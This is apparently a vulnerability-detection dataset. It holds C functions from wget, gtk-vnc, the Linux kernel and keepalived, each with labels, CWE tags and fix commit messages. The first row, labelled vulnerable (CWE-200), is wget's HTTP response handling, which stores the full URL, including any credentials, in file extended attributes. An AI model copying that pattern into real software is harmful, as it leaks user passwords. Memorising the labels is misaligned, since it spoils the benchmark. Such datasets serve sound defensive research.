auth_err = check_auth (u, user, passwd, resp, req,
&ntlm_seen, &retry,
&basic_auth_finished,
&auth_finished);
if (auth_err == RETROK && retry)
{
xfree (hs->message);
resp_free (&resp);
xfree (message);
xfree (head);
goto retry_with_auth;
}
}
if (auth_err == RETROK)
retval = AUTHFAILED;
else
retval = auth_err;
goto cleanup;
}
else /* statcode != HTTP_STATUS_UNAUTHORIZED */
{
/* Kludge: if NTLM is used, mark the TCP connection as authorized. */
if (ntlm_seen)
pconn.authorized = true;
}
{
uerr_t ret = check_file_output (u, hs, resp, hdrval, sizeof hdrval);
if (ret != RETROK)
{
retval = ret;
goto cleanup;
}
}
hs->statcode = statcode;
if (statcode == -1)
hs->error = xstrdup (_("Malformed status line"));
else if (!*message)
hs->error = xstrdup (_("(no description)"));
else
hs->error = xstrdup (message);
#ifdef HAVE_HSTS
if (opt.hsts && hsts_store)
{
hsts_params = resp_header_strdup (resp, "Strict-Transport-Security");
if (parse_strict_transport_security (hsts_params, &max_age, &include_subdomains))
{
/* process strict transport security */
if (hsts_store_entry (hsts_store, u->scheme, u->host, u->port, max_age, include_subdomains))
DEBUGP(("Added new HSTS host: %s:%u (max-age: %lu, includeSubdomains: %s)\n",
u->host,
(unsigned) u->port,
(unsigned long) max_age,
(include_subdomains ? "true" : "false")));
else
DEBUGP(("Updated HSTS host: %s:%u (max-age: %lu, includeSubdomains: %s)\n",
u->host,
(unsigned) u->port,
(unsigned long) max_age,
(include_subdomains ? "true" : "false")));
}
}
#endif
type = resp_header_strdup (resp, "Content-Type");
if (type)
{
char *tmp = strchr (type, ';');
if (tmp)
{
#ifdef ENABLE_IRI
/* sXXXav: only needed if IRI support is enabled */
char *tmp2 = tmp + 1;
#endif
while (tmp > type && c_isspace (tmp[-1]))
--tmp;
*tmp = '\0';
#ifdef ENABLE_IRI
/* Try to get remote encoding if needed */
if (opt.enable_iri && !opt.encoding_remote)
{
tmp = parse_charset (tmp2);
if (tmp)
set_content_encoding (iri, tmp);
xfree (tmp);
}
#endif
}
}
hs->newloc = resp_header_strdup (resp, "Location");
hs->remote_time = resp_header_strdup (resp, "Last-Modified");
if (!hs->remote_time) // now look for the Wayback Machine's timestamp
hs->remote_time = resp_header_strdup (resp, "X-Archive-Orig-last-modified");
if (resp_header_copy (resp, "Content-Range", hdrval, sizeof (hdrval)))
{
wgint first_byte_pos, last_byte_pos, entity_length;
if (parse_content_range (hdrval, &first_byte_pos, &last_byte_pos,
&entity_length))
{
contrange = first_byte_pos;
contlen = last_byte_pos - first_byte_pos + 1;
}
}
if (resp_header_copy (resp, "Content-Encoding", hdrval, sizeof (hdrval)))
{
hs->local_encoding = ENC_INVALID;
switch (hdrval[0])
{
case 'b': case 'B':
if (0 == c_strcasecmp(hdrval, "br"))
hs->local_encoding = ENC_BROTLI;
break;
case 'c': case 'C':
if (0 == c_strcasecmp(hdrval, "compress"))
hs->local_encoding = ENC_COMPRESS;
break;
case 'd': case 'D':
if (0 == c_strcasecmp(hdrval, "deflate"))
hs->local_encoding = ENC_DEFLATE;
break;
case 'g': case 'G':
if (0 == c_strcasecmp(hdrval, "gzip"))
hs->local_encoding = ENC_GZIP;
break;
case 'i': case 'I':
if (0 == c_strcasecmp(hdrval, "identity"))
hs->local_encoding = ENC_NONE;
break;
case 'x': case 'X':
if (0 == c_strcasecmp(hdrval, "x-compress"))
hs->local_encoding = ENC_COMPRESS;
else if (0 == c_strcasecmp(hdrval, "x-gzip"))
hs->local_encoding = ENC_GZIP;
break;
case '\0':
hs->local_encoding = ENC_NONE;
}
if (hs->local_encoding == ENC_INVALID)
{
DEBUGP (("Unrecognized Content-Encoding: %s\n", hdrval));
hs->local_encoding = ENC_NONE;
}
#ifdef HAVE_LIBZ
else if (hs->local_encoding == ENC_GZIP
&& opt.compression != compression_none)
{
const char *p;
/* Make sure the Content-Type is not gzip before decompressing */
if (type)
{
p = strchr (type, '/');
if (p == NULL)
{
hs->remote_encoding = ENC_GZIP;
hs->local_encoding = ENC_NONE;
}
else
{
p++;
if (c_tolower(p[0]) == 'x' && p[1] == '-')
p += 2;
if (0 != c_strcasecmp (p, "gzip"))
{
hs->remote_encoding = ENC_GZIP;
hs->local_encoding = ENC_NONE;
}
}
}
else
{
hs->remote_encoding = ENC_GZIP;
hs->local_encoding = ENC_NONE;
}
/* don't uncompress if a file ends with '.gz' or '.tgz' */
if (hs->remote_encoding == ENC_GZIP
&& (p = strrchr(u->file, '.'))
&& (c_strcasecmp(p, ".gz") == 0 || c_strcasecmp(p, ".tgz") == 0))
{
DEBUGP (("Enabling broken server workaround. Will not decompress this GZip file.\n"));
hs->remote_encoding = ENC_NONE;
}
}
#endif
}
/* 20x responses are counted among successful by default. */
if (H_20X (statcode))
*dt |= RETROKF;
if (statcode == HTTP_STATUS_NO_CONTENT)
{
/* 204 response has no body (RFC 2616, 4.3) */
/* In case the caller cares to look... */
hs->len = 0;
hs->res = 0;
hs->restval = 0;
CLOSE_FINISH (sock);
retval = RETRFINISHED;
goto cleanup;
}
/* Return if redirected. */
if (H_REDIRECTED (statcode) || statcode == HTTP_STATUS_MULTIPLE_CHOICES)
{
/* RFC2068 says that in case of the 300 (multiple choices)
response, the server can output a preferred URL through
`Location' header; otherwise, the request should be treated
like GET. So, if the location is set, it will be a
redirection; otherwise, just proceed normally. */
if (statcode == HTTP_STATUS_MULTIPLE_CHOICES && !hs->newloc)
*dt |= RETROKF;
else
{
logprintf (LOG_VERBOSE,
_("Location: %s%s\n"),
hs->newloc ? escnonprint_uri (hs->newloc) : _("unspecified"),
hs->newloc ? _(" [following]") : "");
/* In case the caller cares to look... */
hs->len = 0;
hs->res = 0;
hs->restval = 0;
/* Normally we are not interested in the response body of a redirect.
But if we are writing a WARC file we are: we like to keep everything. */
if (warc_enabled)
{
int _err = read_response_body (hs, sock, NULL, contlen, 0,
chunked_transfer_encoding,
u->url, warc_timestamp_str,
warc_request_uuid, warc_ip, type,
statcode, head);
if (_err != RETRFINISHED || hs->res < 0)
{
CLOSE_INVALIDATE (sock);
retval = _err;
goto cleanup;
}
else
CLOSE_FINISH (sock);
}
else
{
/* Since WARC is disabled, we are not interested in the response body. */
if (keep_alive && !head_only
&& skip_short_body (sock, contlen, chunked_transfer_encoding))
CLOSE_FINISH (sock);
else
CLOSE_INVALIDATE (sock);
}
/* From RFC2616: The status codes 303 and 307 have
been added for servers that wish to make unambiguously
clear which kind of reaction is expected of the client.
A 307 should be redirected using the same method,
in other words, a POST should be preserved and not
converted to a GET in that case.
With strict adherence to RFC2616, POST requests are not
converted to a GET request on 301 Permanent Redirect
or 302 Temporary Redirect.
A switch may be provided later based on the HTTPbis draft
that allows clients to convert POST requests to GET
requests on 301 and 302 response codes. */
switch (statcode)
{
case HTTP_STATUS_TEMPORARY_REDIRECT:
case HTTP_STATUS_PERMANENT_REDIRECT:
retval = NEWLOCATION_KEEP_POST;
goto cleanup;
case HTTP_STATUS_MOVED_PERMANENTLY:
if (opt.method && c_strcasecmp (opt.method, "post") != 0)
{
retval = NEWLOCATION_KEEP_POST;
goto cleanup;
}
break;
case HTTP_STATUS_MOVED_TEMPORARILY:
if (opt.method && c_strcasecmp (opt.method, "post") != 0)
{
retval = NEWLOCATION_KEEP_POST;
goto cleanup;
}
break;
}
retval = NEWLOCATION;
goto cleanup;
}
}
if (cond_get)
{
if (statcode == HTTP_STATUS_NOT_MODIFIED)
{
logprintf (LOG_VERBOSE,
_ ("File %s not modified on server. Omitting download.\n\n"),
quote (hs->local_file));
*dt |= RETROKF;
CLOSE_FINISH (sock);
retval = RETRUNNEEDED;
goto cleanup;
}
}
set_content_type (dt, type);
if (opt.adjust_extension)
{
const char *encoding_ext = NULL;
switch (hs->local_encoding)
{
case ENC_INVALID:
case ENC_NONE:
break;
case ENC_BROTLI:
encoding_ext = ".br";
break;
case ENC_COMPRESS:
encoding_ext = ".Z";
break;
case ENC_DEFLATE:
encoding_ext = ".zlib";
break;
case ENC_GZIP:
encoding_ext = ".gz";
break;
default:
DEBUGP (("No extension found for encoding %d\n",
hs->local_encoding));
}
if (encoding_ext != NULL)
{
char *file_ext = strrchr (hs->local_file, '.');
/* strip Content-Encoding extension (it will be re-added later) */
if (file_ext != NULL && 0 == strcasecmp (file_ext, encoding_ext))
*file_ext = '\0';
}
if (*dt & TEXTHTML)
/* -E / --adjust-extension / adjust_extension = on was specified,
and this is a text/html file. If some case-insensitive
variation on ".htm[l]" isn't already the file's suffix,
tack on ".html". */
{
ensure_extension (hs, ".html", dt);
}
else if (*dt & TEXTCSS)
{
ensure_extension (hs, ".css", dt);
}
if (encoding_ext != NULL)
{
ensure_extension (hs, encoding_ext, dt);
}
}
if (cond_get)
{
/* Handle the case when server ignores If-Modified-Since header. */
if (statcode == HTTP_STATUS_OK && hs->remote_time)
{
time_t tmr = http_atotm (hs->remote_time);
/* Check if the local file is up-to-date based on Last-Modified header
and content length. */
if (tmr != (time_t) - 1 && tmr <= hs->orig_file_tstamp
&& (contlen == -1 || contlen == hs->orig_file_size))
{
logprintf (LOG_VERBOSE,
_("Server ignored If-Modified-Since header for file %s.\n"
"You might want to add --no-if-modified-since option."
"\n\n"),
quote (hs->local_file));
*dt |= RETROKF;
CLOSE_INVALIDATE (sock);
retval = RETRUNNEEDED;
goto cleanup;
}
}
}
if (statcode == HTTP_STATUS_RANGE_NOT_SATISFIABLE
|| (!opt.timestamping && hs->restval > 0 && statcode == HTTP_STATUS_OK
&& contrange == 0 && contlen >= 0 && hs->restval >= contlen))
{
/* If `-c' is in use and the file has been fully downloaded (or
the remote file has shrunk), Wget effectively requests bytes
after the end of file and the server response with 416
(or 200 with a <= Content-Length. */
logputs (LOG_VERBOSE, _("\
\n The file is already fully retrieved; nothing to do.\n\n"));
/* In case the caller inspects. */
hs->len = contlen;
hs->res = 0;
/* Mark as successfully retrieved. */
*dt |= RETROKF;
/* Try to maintain the keep-alive connection. It is often cheaper to
* consume some bytes which have already been sent than to negotiate
* a new connection. However, if the body is too large, or we don't
* care about keep-alive, then simply terminate the connection */
if (keep_alive &&
skip_short_body (sock, contlen, chunked_transfer_encoding))
CLOSE_FINISH (sock);
else
CLOSE_INVALIDATE (sock);
retval = RETRUNNEEDED;
goto cleanup;
}
if ((contrange != 0 && contrange != hs->restval)
|| (H_PARTIAL (statcode) && !contrange && hs->restval))
{
/* The Range request was somehow misunderstood by the server.
Bail out. */
CLOSE_INVALIDATE (sock);
retval = RANGEERR;
goto cleanup;
}
if (contlen == -1)
hs->contlen = -1;
/* If the response is gzipped, the uncompressed size is unknown. */
else if (hs->remote_encoding == ENC_GZIP)
hs->contlen = -1;
else
hs->contlen = contlen + contrange;
if (opt.verbose)
{
if (*dt & RETROKF)
{
/* No need to print this output if the body won't be
downloaded at all, or if the original server response is
printed. */
logputs (LOG_VERBOSE, _("Length: "));
if (contlen != -1)
{
logputs (LOG_VERBOSE, number_to_static_string (contlen + contrange));
if (contlen + contrange >= 1024)
logprintf (LOG_VERBOSE, " (%s)",
human_readable (contlen + contrange, 10, 1));
if (contrange)
{
if (contlen >= 1024)
logprintf (LOG_VERBOSE, _(", %s (%s) remaining"),
number_to_static_string (contlen),
human_readable (contlen, 10, 1));
else
logprintf (LOG_VERBOSE, _(", %s remaining"),
number_to_static_string (contlen));
}
}
else
logputs (LOG_VERBOSE,
opt.ignore_length ? _("ignored") : _("unspecified"));
if (type)
logprintf (LOG_VERBOSE, " [%s]\n", quotearg_style (escape_quoting_style, type));
else
logputs (LOG_VERBOSE, "\n");
}
}
/* Return if we have no intention of further downloading. */
if ((!(*dt & RETROKF) && !opt.content_on_error) || head_only || (opt.spider && !opt.recursive))
{
/* In case the caller cares to look... */
hs->len = 0;
hs->res = 0;
hs->restval = 0;
/* Normally we are not interested in the response body of error responses.
But if we are writing a WARC file we are: we like to keep everything. */
if (warc_enabled)
{
int _err = read_response_body (hs, sock, NULL, contlen, 0,
chunked_transfer_encoding,
u->url, warc_timestamp_str,
warc_request_uuid, warc_ip, type,
statcode, head);
if (_err != RETRFINISHED || hs->res < 0)
{
CLOSE_INVALIDATE (sock);
retval = _err;
goto cleanup;
}
CLOSE_FINISH (sock);
}
else
{
/* Since WARC is disabled, we are not interested in the response body. */
if (head_only)
/* Pre-1.10 Wget used CLOSE_INVALIDATE here. Now we trust the
servers not to send body in response to a HEAD request, and
those that do will likely be caught by test_socket_open.
If not, they can be worked around using
`--no-http-keep-alive'. */
CLOSE_FINISH (sock);
else if (opt.spider && !opt.recursive)
/* we just want to see if the page exists - no downloading required */
CLOSE_INVALIDATE (sock);
else if (keep_alive
&& skip_short_body (sock, contlen, chunked_transfer_encoding))
/* Successfully skipped the body; also keep using the socket. */
CLOSE_FINISH (sock);
else
CLOSE_INVALIDATE (sock);
}
if (statcode == HTTP_STATUS_GATEWAY_TIMEOUT)
retval = GATEWAYTIMEOUT;
else
retval = RETRFINISHED;
goto cleanup;
}
err = open_output_stream (hs, count, &fp);
if (err != RETROK)
{
CLOSE_INVALIDATE (sock);
retval = err;
goto cleanup;
}
#ifdef ENABLE_XATTR
if (opt.enable_xattr)
{
if (original_url != u)
set_file_metadata (u->url, original_url->url, fp);
else
set_file_metadata (u->url, NULL, fp);
}
#endif
err = read_response_body (hs, sock, fp, contlen, contrange,
chunked_transfer_encoding,
u->url, warc_timestamp_str,
warc_request_uuid, warc_ip, type,
statcode, head);
if (hs->res >= 0)
CLOSE_FINISH (sock);
else
CLOSE_INVALIDATE (sock);
if (!output_stream)
fclose (fp);
retval = err;
cleanup:
xfree (head);
xfree (type);
xfree (message);
resp_free (&resp);
request_free (&req);
return retval;
}
| 1 |
[
"CWE-200"
] |
wget
|
3cdfb594cf75f11cdbb9702ac5e856c332ccacfa
| 282,839,609,107,155,530,000,000,000,000,000,000,000 | 1,026 |
Don't save user/pw with --xattr
Also the Referer info is reduced to scheme+host+port.
* src/ftp.c (getftp): Change params of set_file_metadata()
* src/http.c (gethttp): Change params of set_file_metadata()
* src/xattr.c (set_file_metadata): Remove user/password from origin URL,
reduce Referer value to scheme/host/port.
* src/xattr.h: Change prototype of set_file_metadata()
|
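The change described above stores only a reduced origin/Referer (scheme, host, port, with no userinfo or path) in the file's extended attributes. A small illustrative C helper that rebuilds such a reduced URL from already-parsed components (hypothetical names, not wget's internal struct url):

#include <stdio.h>

/* Build "scheme://host:port/" from parsed components, deliberately
   leaving out user, password, path and query so no credentials or
   sensitive request details end up in file metadata. */
static void format_origin(char *buf, size_t len,
                          const char *scheme, const char *host, int port)
{
    snprintf(buf, len, "%s://%s:%d/", scheme, host, port);
}

int main(void)
{
    char origin[256];
    format_origin(origin, sizeof origin, "https", "example.com", 443);
    printf("%s\n", origin);   /* https://example.com:443/ */
    return 0;
}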
static void test_validation_unexpected_cmap(void)
{
test_validation(test_unexpected_cmap_server);
}
| 0 |
[] |
gtk-vnc
|
c8583fd3783c5b811590fcb7bae4ce6e7344963e
| 103,916,375,801,096,200,000,000,000,000,000,000,000 | 4 |
Correctly validate color map range indexes
The color map index could wrap around to zero causing negative
array index accesses.
https://bugzilla.gnome.org/show_bug.cgi?id=778050
CVE-2017-5885
Signed-off-by: Daniel P. Berrange <[email protected]>
|
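The fix referenced above guards color-map updates against index arithmetic that wraps around and produces out-of-range accesses. A hedged sketch of such a bounds check in C (illustrative, not gtk-vnc's actual code):

#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

#define COLOR_MAP_SIZE 256u

/* Reject a (first, count) range that would fall outside the map,
   including the case where first + count would wrap a 16-bit index. */
static bool color_map_range_ok(uint16_t first, uint16_t count)
{
    uint32_t end = (uint32_t)first + (uint32_t)count;  /* no 16-bit wrap */
    return count != 0 && end <= COLOR_MAP_SIZE;
}

int main(void)
{
    printf("%d\n", color_map_range_ok(0, 256));     /* 1: whole map */
    printf("%d\n", color_map_range_ok(65535, 2));   /* 0: would wrap */
    return 0;
}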
static irqreturn_t xenvif_rx_interrupt(int irq, void *dev_id)
{
struct xenvif *vif = dev_id;
xenvif_kick_thread(vif);
return IRQ_HANDLED;
}
| 0 |
[
"CWE-399"
] |
net-next
|
e9d8b2c2968499c1f96563e6522c56958d5a1d0d
| 217,717,788,620,721,070,000,000,000,000,000,000,000 | 8 |
xen-netback: disable rogue vif in kthread context
When netback discovers a frontend is sending malformed packets it will
disable the interface which serves that frontend.
However, disabling a network interface involves taking a mutex which
cannot be done in softirq context, so we need to defer this process to
kthread context.
This patch does the following:
1. introduce a flag to indicate the interface is disabled.
2. check that flag in TX path, don't do any work if it's true.
3. check that flag in RX path, turn off that interface if it's true.
The reason to disable it in RX path is because RX uses kthread. After
this change the behavior of netback is still consistent -- it won't do
any TX work for a rogue frontend, and the interface will be eventually
turned off.
Also change a "continue" to "break" after xenvif_fatal_tx_err, as it
doesn't make sense to continue processing packets if frontend is rogue.
This is a fix for XSA-90.
Reported-by: Török Edwin <[email protected]>
Signed-off-by: Wei Liu <[email protected]>
Cc: Ian Campbell <[email protected]>
Reviewed-by: David Vrabel <[email protected]>
Acked-by: Ian Campbell <[email protected]>
Signed-off-by: David S. Miller <[email protected]>
|
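The commit message above describes setting a per-interface "disabled" flag, skipping work in the fast TX path when it is set, and letting the RX kthread perform the actual, sleepable shutdown. A user-space sketch of that division of labour (plain C11 atomics, not the kernel's APIs):

#include <stdatomic.h>
#include <stdbool.h>
#include <stdio.h>

struct vif {
    atomic_bool disabled;   /* set from the context that spots the rogue frontend */
};

/* Fast path: cheap to call anywhere, never sleeps. */
static void vif_tx(struct vif *v)
{
    if (atomic_load(&v->disabled))
        return;              /* rogue frontend: do no TX work */
    puts("transmit packet");
}

/* Thread context: safe to take mutexes and actually tear things down. */
static void vif_rx_thread_iteration(struct vif *v)
{
    if (atomic_load(&v->disabled)) {
        puts("carrier off (done in kthread, may sleep)");
        return;
    }
    puts("receive packet");
}

int main(void)
{
    struct vif v = { .disabled = false };
    vif_tx(&v);
    atomic_store(&v.disabled, true);   /* malformed packet detected */
    vif_tx(&v);                        /* silently skipped */
    vif_rx_thread_iteration(&v);       /* interface turned off here */
    return 0;
}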
static int rm_from_queue_full(sigset_t *mask, struct sigpending *s)
{
struct sigqueue *q, *n;
sigset_t m;
sigandsets(&m, mask, &s->signal);
if (sigisemptyset(&m))
return 0;
sigandnsets(&s->signal, &s->signal, mask);
list_for_each_entry_safe(q, n, &s->list, list) {
if (sigismember(mask, q->info.si_signo)) {
list_del_init(&q->list);
__sigqueue_free(q);
}
}
return 1;
}
| 0 |
[
"CWE-400"
] |
linux-stable-rt
|
bcf6b1d78c0bde228929c388978ed3af9a623463
| 290,268,833,502,203,300,000,000,000,000,000,000,000 | 18 |
signal/x86: Delay calling signals in atomic
On x86_64 we must disable preemption before we enable interrupts
for stack faults, int3 and debugging, because the current task is using
a per CPU debug stack defined by the IST. If we schedule out, another task
can come in and use the same stack and cause the stack to be corrupted
and crash the kernel on return.
When CONFIG_PREEMPT_RT_FULL is enabled, spin_locks become mutexes, and
one of these is the spin lock used in signal handling.
Some of the debug code (int3) causes do_trap() to send a signal.
This function calls a spin lock that has been converted to a mutex
and has the possibility to sleep. If this happens, the above issues with
the corrupted stack is possible.
Instead of calling the signal right away, for PREEMPT_RT and x86_64,
the signal information is stored on the stacks task_struct and
TIF_NOTIFY_RESUME is set. Then on exit of the trap, the signal resume
code will send the signal when preemption is enabled.
[ rostedt: Switched from #ifdef CONFIG_PREEMPT_RT_FULL to
ARCH_RT_DELAYS_SIGNAL_SEND and added comments to the code. ]
Cc: [email protected]
Signed-off-by: Oleg Nesterov <[email protected]>
Signed-off-by: Steven Rostedt <[email protected]>
Signed-off-by: Thomas Gleixner <[email protected]>
|
vrrp_check_adv_addr_handler(__attribute__((unused)) vector_t *strvec)
{
global_data->vrrp_skip_check_adv_addr = 1;
}
| 0 |
[
"CWE-200"
] |
keepalived
|
c6247a9ef2c7b33244ab1d3aa5d629ec49f0a067
| 300,749,264,210,411,200,000,000,000,000,000,000,000 | 4 |
Add command line and configuration option to set umask
Issue #1048 identified that files created by keepalived are created
with mode 0666. This commit changes the default to 0644, and also
allows the umask to be specified in the configuration or as a command
line option.
Signed-off-by: Quentin Armitage <[email protected]>
|
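The change described above makes the file-creation mode configurable through a umask setting. A minimal C illustration of how a process umask turns a requested mode of 0666 into 0644 on created files:

#include <fcntl.h>
#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>

int main(void)
{
    umask(022);   /* configured umask: clear group/other write bits */

    /* Requested 0666; the effective mode becomes 0644 because of the umask. */
    int fd = open("example.tmp", O_CREAT | O_WRONLY, 0666);
    if (fd < 0) { perror("open"); return 1; }

    struct stat st;
    fstat(fd, &st);
    printf("mode: %o\n", (unsigned)(st.st_mode & 0777));   /* prints 644 */

    close(fd);
    unlink("example.tmp");
    return 0;
}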